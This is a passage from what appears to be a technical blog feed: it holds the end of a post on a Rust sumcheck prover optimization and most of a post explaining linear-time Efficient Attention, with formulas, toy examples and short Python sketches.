&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; PoW interaction (grinding resistance)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    verifier_state.check_pow_grinding(pow_bits)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Sample the next verifier folding randomness rᵢ.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let rand: EF = verifier_state.sample();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Update sum.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    *claimed_sum = c2 * rand.square() + (c1 - c0 - c2) * rand + c0;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    randomness.push(rand);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; [...]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The verifier never computes accumulators or evaluates polynomials directly: it only reads two field elements from the proof and derives the third. Compared with the classical sumcheck verifier, which reads three elements per round and checks the sum constraint explicitly, this shrinks the proof and slightly reduces the verifier’s work.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;vii-conclusion&quot;&gt;VII. Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;In this post we presented a complete implementation in Rust of &lt;em&gt;Algorithm 6&lt;&#x2F;em&gt; from the BDDT paper, bringing together both optimization techniques (SVO and Eq-Poly) into a working prover.&lt;&#x2F;p&gt;
&lt;p&gt;As a bonus, we also reduce the proof size by sending only two field elements per round, exploiting the sum constraint to let the verifier derive the missing value.&lt;&#x2F;p&gt;
&lt;p&gt;These optimizations are now part of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;whir-p3&quot;&gt;our whir-p3 fork&lt;&#x2F;a&gt; and have been &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;tcoratger&#x2F;whir-p3&#x2F;pull&#x2F;322&quot;&gt;merged into the original repository&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;references&quot;&gt;References&lt;&#x2F;h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2025&#x2F;1117&quot;&gt;Small Value Optimization Paper&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a href=&quot;&#x2F;optimizing-sumcheck&#x2F;&quot;&gt;Optimizing Sumcheck (Part I)&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a href=&quot;&#x2F;how-factoring-equality-polynomials-optimizes-sumcheck&#x2F;&quot;&gt;How factoring equality polynomials optimizes sumcheck (Part II)&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a href=&quot;&#x2F;whirlaway-multilinear-starks-using-whir-as-polynomial-commitment-scheme&#x2F;&quot;&gt;Whirlaway: Multilinear STARKs using WHIR&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;tcoratger&#x2F;whir-p3&quot;&gt;whir-p3 Repository&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;whir-p3&quot;&gt;Our fork of the whir-p3 Repository&lt;&#x2F;a&gt;&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;</description>
      </item>
      <item>
          <title>Efficient attention explained: the math behind linear-time transformers</title>
          <pubDate>Mon, 13 Oct 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/efficient-attention-explained-the-math-behind-linear-time-transformers/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/efficient-attention-explained-the-math-behind-linear-time-transformers/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/efficient-attention-explained-the-math-behind-linear-time-transformers/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;One of the key components of the Transformer architecture is the Attention layer, which is in charge of making every word (or more generally, every &lt;em&gt;token&lt;&#x2F;em&gt;) learn the context given by every other token in a sequence, and was introduced in the seminal paper &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;abs&#x2F;1706.03762&quot;&gt;Attention is all you need&lt;&#x2F;a&gt;. In this post, we will explore this equation and a specific approach that manages to improve its complexity to be linear with a few mathematical tricks, following the work of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;1812.01243&quot;&gt;Shen et al. (2021)&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;how-the-original-implementation-of-attention-works&quot;&gt;How the original implementation of Attention works&lt;&#x2F;h2&gt;
&lt;p&gt;There’s a lot of information about the original Attention (also known as dot product Attention) implementation out there so we’ll do just a quick recap of it. It all comes down to a bunch of matrix multiplications with a normalization function. The exact mathematical formulation is&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
Attention(Q,K,V) = softmax(\frac{{QK^T}}{\sqrt{d_k}})V&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;where,&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;$Q \in \mathbb{R}^{N\times d_q}$ are the projections of the input sequence over the query space&lt;&#x2F;li&gt;
&lt;li&gt;$K \in \mathbb{R}^{N\times d_k}$ are the projections of the input sequence over the key space&lt;&#x2F;li&gt;
&lt;li&gt;$V \in \mathbb{R}^{N\times d_v}$ are the projections of the input sequence over the value space&lt;&#x2F;li&gt;
&lt;li&gt;$N$ is the sequence (or &lt;em&gt;context&lt;&#x2F;em&gt;) length, i.e., the maximum size of the input&lt;&#x2F;li&gt;
&lt;li&gt;$d_{q}, d_{k}$ and $d_{v}$ are the dimensions of each of the projection spaces&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Both the $Q$ and $K$ matrices must have the same embedding dimension, so $d_k = d_q$; for simplicity, we will also take $d_{q} = d_{k} = d_{v} = d$.&lt;&#x2F;p&gt;
&lt;p&gt;The softmax function maps each element of an arbitrary array of real numbers into the range $(0, 1)$, with the outputs summing to 1 - this is how it looks for a given input element:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;softmax.png?raw=true&quot; alt=&quot;Im 1&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The $\sqrt{d_k}$ scaling factor is present to prevent the softmax function from saturating – as $d_k$ becomes larger, the dot products in $QK^T$ grow larger in magnitude, pushing the softmax function into regions where it is essentially flat and thus has extremely small gradients. During backpropagation, this can cause stability issues, slow training, or even leave some parameters frozen for the entire training run.&lt;&#x2F;p&gt;
&lt;p&gt;We use the softmax function to go from attention scores (the results of the matrix multiplication of $QK^T$) to attention weights that will be multiplied by the $V$ matrix. The attention weights can be interpreted as how much each token affects the other ones in the sequence. If the attention weight between a pair of tokens is high, then we say that one &lt;em&gt;attends&lt;&#x2F;em&gt; to the other.&lt;br &#x2F;&gt;
As an example, from basic English grammar, we know that in the sentence&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Do androids dream of electric sheep?&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;the word &lt;em&gt;&lt;strong&gt;sheep&lt;&#x2F;strong&gt;&lt;&#x2F;em&gt; attends more to &lt;em&gt;&lt;strong&gt;electric&lt;&#x2F;strong&gt;&lt;&#x2F;em&gt; than to the word &lt;em&gt;&lt;strong&gt;do&lt;&#x2F;strong&gt;.&lt;&#x2F;em&gt;&lt;&#x2F;p&gt;
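&lt;p&gt;The whole mechanism fits in a few lines. Here is a minimal, dependency-free Python sketch of dot-product Attention (for illustration only; real implementations use batched tensor operations):&lt;&#x2F;p&gt;

```python
import math


def softmax(row):
    m = max(row)  # subtract the max for numerical stability
    exps = [math.exp(v - m) for v in row]
    total = sum(exps)
    return [e / total for e in exps]


def attention(Q, K, V):
    """Dot-product attention: softmax(Q K^T / sqrt(d_k)) V.

    Matrices are lists of rows; one output row per query."""
    d_k = len(K[0])
    outputs = []
    for q in Q:
        # Attention scores of this query against every key, scaled by sqrt(d_k).
        scores = [sum(qi * ki for qi, ki in zip(q, k)) / math.sqrt(d_k) for k in K]
        weights = softmax(scores)  # attention weights: non-negative, sum to 1
        # Output: weighted combination of the value vectors.
        outputs.append([sum(w * v[t] for w, v in zip(weights, V))
                        for t in range(len(V[0]))])
    return outputs
```

A handy sanity check: if every query scores all keys equally, the weights are uniform and each output row is just the average of the value vectors.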
&lt;h2 id=&quot;deep-dive-into-attention-complexity&quot;&gt;Deep dive into Attention complexity&lt;&#x2F;h2&gt;
&lt;p&gt;One of the major drawbacks of the Attention mechanism is the way in which computational resources scale with respect to the sequence length $N$. In the definition of the Attention function we can see the similarity calculation between the vectors in $Q$ and $K$, given by $QK^T$. From basic matrix multiplication we know that,&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
(\mathbb{R}^{N\times d} \times \mathbb{R}^{d\times N}) \rightarrow \mathbb{R}^{N\times N}&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;which means that we end up having to store an $N \times N$ matrix and hence have $O(N^2)$ memory complexity. On the other hand, this matrix multiplication needs a total of $O(d_{k}N^2)$ operations, so we can clearly see that resource demands scale quite quickly as the sequence length gets larger.&lt;&#x2F;p&gt;
&lt;p&gt;In essence, the original attention architecture is really limited by the sequence length we can use, making it infeasible for situations where bigger contexts are needed. There has been a lot of effort put into optimizing the original Attention mechanism, and we will focus on an approach that stands out due to its simplicity, while keeping its trade-offs in mind.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;efficient-attention&quot;&gt;Efficient Attention&lt;&#x2F;h2&gt;
&lt;p&gt;Since the scaling issues come from having to compute and store the $N \times N$ matrix as an intermediate value in the computation, if we could somehow apply softmax piecemeal we could have simpler intermediate values. If we apply softmax to the rows of $Q$, and to the columns of $K$ separately and &lt;em&gt;then&lt;&#x2F;em&gt; do the product, we can avoid storing the entire matrix. Since we are no longer performing a dot product in this approximation, we also do not need the scaling factor $\sqrt{d_k}$.&lt;&#x2F;p&gt;
&lt;p&gt;Thus, efficient Attention, as proposed by &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;1812.01243&quot;&gt;Shen et al. (2021)&lt;&#x2F;a&gt;, is given by:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
E(Q,K,V) = softmax_{row}(Q)softmax_{col}(K)^T V&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;where now we make the distinction between $softmax_{row}$ and $softmax_{col}$, where we apply the softmax function in the rows and the columns of the matrices, respectively. In general, when there is no specification, the $softmax_{row}$ version is assumed.&lt;&#x2F;p&gt;
&lt;p&gt;The trick boils down to getting rid of applying the softmax function over the result of $QK^T$ – kind of like distributing the softmax function into $Q$ and $K$, with the caveat that this is not really a mathematical property of the softmax function but an approximation. This way, we can arrange the order of the matrix multiplications in this expression to our advantage, making the resulting computation much more efficient.&lt;&#x2F;p&gt;
&lt;p&gt;If we first compute $softmax_{col}(K)^TV$, we only have to store a $d \times d$ matrix, which means $O(d^2)$ memory complexity, and the computation requires $O(Nd^2)$ operations, which is $O(N)$ since $d \ll N$. This attention implementation is sometimes referred to as &lt;em&gt;Linear Attention&lt;&#x2F;em&gt; due to the linear dependency on $N$.&lt;&#x2F;p&gt;
&lt;p&gt;The efficiency gains make themselves obvious considering that $d &amp;lt; N$ in any practical case, and the difference grows as we make context lengths bigger and bigger.&lt;&#x2F;p&gt;
&lt;p&gt;To reiterate, the mathematical expression for this new Attention mechanism works as an &lt;em&gt;approximation&lt;&#x2F;em&gt;, since the two softmax operations applied over $Q$ and $K$ are not equivalent to the single softmax over $QK^T$. The core property that both variants share, and what makes the approximation reasonable, is that the rows of $softmax_{row}(QK^T)$ and of $softmax_{row}(Q)softmax_{col}(K)^T$ both sum to 1.&lt;&#x2F;p&gt;
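&lt;p&gt;A small Python sketch (illustrative only, with our own helper names) makes both the reordering and the row-sum property easy to check:&lt;&#x2F;p&gt;

```python
import math


def softmax_rows(M):
    out = []
    for row in M:
        m = max(row)  # subtract the max for numerical stability
        exps = [math.exp(v - m) for v in row]
        total = sum(exps)
        out.append([e / total for e in exps])
    return out


def softmax_cols(M):
    # Softmax over columns = transpose, softmax over rows, transpose back.
    t = [list(col) for col in zip(*M)]
    return [list(col) for col in zip(*softmax_rows(t))]


def matmul(A, B):
    return [[sum(a * b for a, b in zip(row, col)) for col in zip(*B)] for row in A]


def efficient_attention(Q, K, V):
    """E(Q, K, V) = softmax_row(Q) (softmax_col(K))^T V, grouped for linear cost."""
    k_cols = softmax_cols(K)
    # Global context: (softmax_col(K))^T V is only d x d_v, never N x N.
    context = matmul([list(col) for col in zip(*k_cols)], V)
    return matmul(softmax_rows(Q), context)
```

Multiplying $softmax_{row}(Q)$ by $softmax_{col}(K)^T$ directly would reproduce the $N \times N$ matrix; grouping the product as above is what keeps memory at $O(d^2)$.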
&lt;p&gt;The approximation is good enough for some applications where the context length $N$ can be large. An example of this is the Computer Vision field, where input tokens may represent pixels of an image. Other examples include audio and genomics, where input lengths can reach millions.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;interpretability-of-efficient-attention&quot;&gt;Interpretability of Efficient Attention&lt;&#x2F;h2&gt;
&lt;p&gt;When trying to make sense of what this change means in the LLM context, we can think of the standard attention mechanism as the process of all elements in our query matrix asking all elements in the key matrix what they should pay attention to. It’s an iterative process to get the correlation between one word (the query element) and the rest of the words in the same sentence (the key elements). We’re essentially doing:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
s_{ij} = Q_iK_j^T&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;for all &lt;em&gt;j&lt;&#x2F;em&gt; in the input sequence. Each of these $s_i$ (the full set of scores for position &lt;em&gt;i&lt;&#x2F;em&gt;) is called an &lt;em&gt;attention map&lt;&#x2F;em&gt;, so we create $N$ such attention maps (one for each of our $N$ input positions).&lt;&#x2F;p&gt;
&lt;p&gt;The Efficient Attention mechanism creates attention maps that are not tied to the position of a specific query and instead capture a more general aspect of the whole input. Instead of each query having its own attention map checking correlation with every other element, we create &lt;strong&gt;global attention maps&lt;&#x2F;strong&gt; that capture general semantic themes.&lt;&#x2F;p&gt;
&lt;p&gt;These maps are derived from the keys $K$, but they no longer depend on specific positions. They are denoted $k_j^T$, and when multiplied by the elements in our value matrix we get $d_{k}$ vectors denoted as $g_i$. Each query then uses coefficients to mix these global themes rather than attending to individual positions.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s see a practical toy example with some random numbers to see the difference clearly:&lt;&#x2F;p&gt;
&lt;p&gt;Suppose we have the sentence &lt;strong&gt;“With great power comes great responsibility”&lt;&#x2F;strong&gt; with &lt;strong&gt;N = 6&lt;&#x2F;strong&gt; tokens and &lt;strong&gt;$d_{k} = 4$&lt;&#x2F;strong&gt; (so we’ll generate 4 global attention maps).&lt;&#x2F;p&gt;
&lt;p&gt;In &lt;strong&gt;Dot Product Attention&lt;&#x2F;strong&gt; , each of the 6 tokens creates its own attention map over all 6 positions:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Token 3 (“power”)&lt;&#x2F;strong&gt; creates an attention map $s_3$:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
s_3 = [0.08, 0.45, 0.15, 0.20, 0.05, 0.07]&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;This tells “power” to attend strongly to position 2 (“great”) and moderately to position 4 (“comes”). We get the output:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
output_3=0.08⋅V_1+0.45⋅V_2+0.15⋅V_3+0.20⋅V_4+0.05⋅V_5+0.07⋅V_6&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Token 4 (“comes”)&lt;&#x2F;strong&gt; creates its own separate attention map $s_4$:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
s_4 = [0.05, 0.12, 0.38, 0.10, 0.08, 0.27]&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;This tells “comes” to attend strongly to positions 3 (“power”) and 6 (“responsibility”). We get the output:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
output_4=0.05⋅V_1+0.12⋅V_2+0.38⋅V_3+0.10⋅V_4+0.08⋅V_5+0.27⋅V_6&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;Similarly, all 6 tokens each create their own attention map. &lt;strong&gt;Total: 6 attention maps, each of size 6.&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
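&lt;p&gt;The weighted sums above can be checked with a short plain-Python sketch. The attention maps $s_3$ and $s_4$ are the ones from the example; the 2-dimensional value vectors $V_j$ are made-up toy numbers, not values from the text:&lt;&#x2F;p&gt;

```python
# Toy illustration of Dot Product Attention outputs.
# s_3 and s_4 are the attention maps from the example above;
# the 2-dimensional value vectors V are made-up numbers for demonstration.

def attend(weights, values):
    """Weighted sum of value vectors under one attention map."""
    dim = len(values[0])
    return [sum(w * v[d] for w, v in zip(weights, values)) for d in range(dim)]

V = [[1.0, 0.0], [0.5, 0.5], [0.2, 0.8], [0.9, 0.1], [0.3, 0.3], [0.6, 0.4]]
s_3 = [0.08, 0.45, 0.15, 0.20, 0.05, 0.07]  # attention map of token 3 ("power")
s_4 = [0.05, 0.12, 0.38, 0.10, 0.08, 0.27]  # attention map of token 4 ("comes")

output_3 = attend(s_3, V)
output_4 = attend(s_4, V)

# Each attention map is a probability distribution over the 6 positions.
assert abs(sum(s_3) - 1.0) < 1e-9 and abs(sum(s_4) - 1.0) < 1e-9
```

&lt;p&gt;Since each attention map sums to 1, every output is a convex combination of the value vectors.&lt;&#x2F;p&gt;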
&lt;p&gt;In &lt;strong&gt;Efficient Attention&lt;&#x2F;strong&gt; , instead of position-specific attention maps, we can create, for example, &lt;strong&gt;4 global semantic attention maps&lt;&#x2F;strong&gt; that capture themes across the entire sentence. In a language context, an example of these global maps for this input sentence could be something like:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Modifier theme: The model encodes the fact that _great_ qualifies both _power_ and _responsibility_. &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * _“great” → “power”_&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * _“great” → “responsibility”_&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Cause-consequence theme: This encodes the overall causal&#x2F;propositional structure &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * “power” → “responsibility”&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * “with … power” → “comes … responsibility”&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Predicate theme: Maps tokens to the main predicate. This reduces the need for the model to discover the verb as the organizing node — the map enforces it. &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * All words point toward the main verb _“comes”_&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Parallelism - Analogy theme: Highlights symmetry between paired concepts &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * _“power” ↔ “responsibility”_&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       * Both are treated as abstract nouns of similar importance&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;strong&gt;$k_1^T$ (Modifier theme)&lt;&#x2F;strong&gt; : $[0.10, 0.85, 0.15, 0.10, 0.85, 0.20]$ → creates $g_1$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;$k_2^T$ (Cause-consequence theme)&lt;&#x2F;strong&gt; : $[0.05, 0.10, 0.90, 0.05, 0.10, 0.88]$ → creates $g_2$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;$k_3^T$ (Predicate theme)&lt;&#x2F;strong&gt; : $[0.20, 0.05, 0.10, 0.95, 0.05, 0.10]$ → creates $g_3$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;$k_4^T$ (Parallelism-Analogy theme)&lt;&#x2F;strong&gt; : $[0.90, 0.15, 0.20, 0.15, 0.10, 0.10]$ → creates $g_4$&lt;&#x2F;p&gt;
&lt;p&gt;Each $g_i$ is a weighted sum of all value vectors $V_{j}$ using the corresponding global map weights.&lt;&#x2F;p&gt;
&lt;p&gt;Each token mixes these 4 global themes:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Token 3 (“power”)&lt;&#x2F;strong&gt; with $q_3=[0.30,0.20,0.10,0.40]$&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
output_3=0.30⋅g_1+0.20⋅g_2+0.10⋅g_3+0.40⋅g_4&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Token 4 (“comes”)&lt;&#x2F;strong&gt; with $q_4=[0.10,0.25,0.40,0.25]$&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
output_4=0.10⋅g_1+0.25⋅g_2+0.40⋅g_3+0.25⋅g_4&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;Here, there are only four global maps shared by all tokens, and each token selects which themes it should attend to, rather than attending to each of the other words in the sentence. The number and composition of themes and how they are picked are just part of this example.&lt;&#x2F;p&gt;
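&lt;p&gt;The theme-mixing step can be sketched the same way. The global map weights $k_j^T$ and the mixing coefficients $q_3$ are the ones from the example above; the value vectors are again made-up toy numbers:&lt;&#x2F;p&gt;

```python
# Sketch of Efficient Attention on the toy example above.
# The global map weights (the k_j^T rows) and the query mixing
# coefficients q_3 come from the text; V is made-up toy data.

def weighted_sum(weights, vectors):
    dim = len(vectors[0])
    return [sum(w * v[d] for w, v in zip(weights, vectors)) for d in range(dim)]

V = [[1.0, 0.0], [0.5, 0.5], [0.2, 0.8], [0.9, 0.1], [0.3, 0.3], [0.6, 0.4]]

global_maps = [  # k_1^T .. k_4^T, each a weighting over the 6 token positions
    [0.10, 0.85, 0.15, 0.10, 0.85, 0.20],
    [0.05, 0.10, 0.90, 0.05, 0.10, 0.88],
    [0.20, 0.05, 0.10, 0.95, 0.05, 0.10],
    [0.90, 0.15, 0.20, 0.15, 0.10, 0.10],
]

# Each global map produces one theme vector g_j, computed once for all tokens.
g = [weighted_sum(k, V) for k in global_maps]

# Token 3 ("power") mixes the four themes with its coefficients q_3.
q_3 = [0.30, 0.20, 0.10, 0.40]
output_3 = weighted_sum(q_3, g)
```

&lt;p&gt;The four $g_j$ are computed once and shared by every token; each token only pays for the small mixing step.&lt;&#x2F;p&gt;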
&lt;h2 id=&quot;lost-in-the-big-picture&quot;&gt;Lost in the Big Picture&lt;&#x2F;h2&gt;
&lt;p&gt;While Efficient Attention offers significant computational advantages, it comes with an important trade-off: it loses the ability to sharply focus on specific positions and instead focuses on coarse global features. Let’s demonstrate this limitation with a practical example.&lt;&#x2F;p&gt;
&lt;p&gt;In this example, we’ll compare the attention scores produced by $softmax(\frac{{QK^T}}{\sqrt{d_k}})$ vs $softmax({{Q}}) ⋅ softmax({{K}})^T$. Although Efficient Attention actually computes $softmax({{K}})^T ⋅ V$ first to achieve its efficiency gains, the final attention distribution remains the same. Examining the scores directly helps us visualize and understand what’s happening to the attention pattern.&lt;&#x2F;p&gt;
&lt;p&gt;Recall from linear algebra that the dot product of two vectors relates to their similarity:&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
a \cdot b = |a| \, |b| \cos(\theta_{ab})&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;When vectors are closely aligned, their dot product is large.&lt;&#x2F;p&gt;
&lt;p&gt;In the example below, we have one query vector and four key vectors. Notice that the third key is identical to our query, so we should expect it to receive most of the attention:&lt;&#x2F;p&gt;
&lt;p&gt;$q = [2, 1, 3]$&lt;&#x2F;p&gt;
&lt;p&gt;$k_1 = [1, 0, 1]$, $k_2 = [0, 1, 0]$, $k_3 = [2, 1, 3]$, $k_{4} = [1, 1, 0]$&lt;&#x2F;p&gt;
&lt;p&gt;For the standard Dot-product Attention case,&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
AttnWeight_1= softmax(\frac{q.k_1}{\sqrt{3}}) = 0.005&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
AttnWeight_2 = softmax(\frac{q.k_2}{\sqrt{3}}) = 0.001&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
AttnWeight_3 = softmax(\frac{q.k_3}{\sqrt{3}}) = 0.992&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
AttnWeight_4 = softmax(\frac{q.k_4}{\sqrt{3}}) = 0.002&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
&lt;p&gt;As we expected, position 3 got almost all the attention.&lt;&#x2F;p&gt;
&lt;p&gt;We now repeat the same calculations for the Efficient Attention case. For simplicity in the calculations here, we will use the matrix formulation where $K$ is the matrix created by setting the vectors $k_i$ as rows.&lt;&#x2F;p&gt;
&lt;p&gt;$$&lt;br &#x2F;&gt;
softmax(q) \cdot softmax_{col}(K)^T = [0.1309, 0.0713, 0.6962, 0.1017]&lt;br &#x2F;&gt;
$$&lt;&#x2F;p&gt;
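&lt;p&gt;Both score computations on this toy example can be reproduced with a self-contained, standard-library Python sketch (the resulting numbers match the ones quoted above up to rounding):&lt;&#x2F;p&gt;

```python
import math

def softmax(xs):
    exps = [math.exp(x) for x in xs]
    s = sum(exps)
    return [e / s for e in exps]

q = [2.0, 1.0, 3.0]
K = [[1.0, 0.0, 1.0], [0.0, 1.0, 0.0], [2.0, 1.0, 3.0], [1.0, 1.0, 0.0]]
d_k = 3

# Standard attention: softmax over the scaled scores q . k_j / sqrt(d_k).
scores = [sum(qi * ki for qi, ki in zip(q, k)) / math.sqrt(d_k) for k in K]
standard = softmax(scores)

# Efficient attention scores: softmax(q) . softmax_col(K)^T, i.e. softmax
# over the query dimensions times a column-wise softmax of K.
q_sm = softmax(q)
cols = [softmax([K[j][d] for j in range(len(K))]) for d in range(d_k)]
efficient = [sum(q_sm[d] * cols[d][j] for d in range(d_k)) for j in range(len(K))]
```

&lt;p&gt;Running this reproduces the sharp peak ($\approx 0.992$ at position 3) for standard attention and the flattened distribution ($\approx 0.70$ at position 3) for the efficient variant.&lt;&#x2F;p&gt;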
